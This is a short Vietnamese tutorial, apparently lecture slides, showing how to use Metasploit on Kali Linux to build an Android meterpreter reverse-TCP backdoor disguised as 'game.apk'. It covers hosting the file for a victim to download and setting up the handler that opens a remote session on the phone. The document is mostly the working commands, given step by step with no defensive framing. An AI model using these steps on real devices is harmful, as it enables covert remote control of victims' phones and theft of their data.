1. Tạo mã độc và tấn công trên Kalilinux.
Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy android
tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali
Linux bằng Virtualbox, đầu tiên ta thiết lập phần Network như sau:
Bước 1: Cài đặt mạng cho kalilinux.
Khởi động máy ảo, vào menu Machine->Setting , chọn thẻ Network.
Chọn cấu hình mạng phù hợp, ở đây ta chọn mạng Briged Adapter và card
mạng lan đang sử dụng, sau đó khởi động kalilinux,
2. Bước 2: Mở Console, gõ lệnh ifconfig để xem địa chỉ IP,
Bước 3: Tạo mã độc:
Gõ lệnh :
Msfpayload android/meterpreter/reverse_tcp lhost=<IP > lport=4444 R >
~/Desktop/game.apk
Thông số lhost chính là IP của máy attacker, còn lport là port listening của máy
attacker, có thể chọn port khác, không nên chọn các port thường dùng vì dễ
đụng cổng, còn game.apk chính tên file mã độc.
3. File apk sẽ được tạo ra ngoài desktop, đây chính là metasploit reverse_tcp
backdoor, ta copy vào thư mục var/www và khởi động webserver để share file
apk, ở victim sẽ vào địa chỉ http://<IP_attacker>/<filename>.apk để tải về.
Bước 4: Tấn công:
- Khởi động metasploit bằng lệnh msfconsole.
4. - Sau khi load msfconsole load xong, ta phải tao một handler để xử lý dữ liệu
truyền về bằng các lệnh sau :
use exploit/multi/handler => chọn handle để xử lý dữ liệu truyền về
set payload android/meterpreter/reverse_tcp => chọn payload tương
tự như lúc tạo mã độc
set lhost 192.168.10.104 => đây là IP của máy kalilinux như tạo mã độc.
set lport 4444 => port giống như tạo mã độc ở trên
exploit => bắt đầu tấn công
- Chờ máy victim tải file apk về cài đặt và chạy …
5. Bước 5: Tấn công:
Trên máy android, vào trình duyệt, truy cập vào địa chỉ
http://<ipattacker>/game.apk, tải file về và cài đặt, sau khi run ta có giao diện
sau:
- Tải mã độc trên android
- Cài đặt mã độc trên Android:
6. Khi đó, trên kali sẽ có 1 session được mở ra, tại đây chúng ta đã có thể xâm
nhập vào máy android.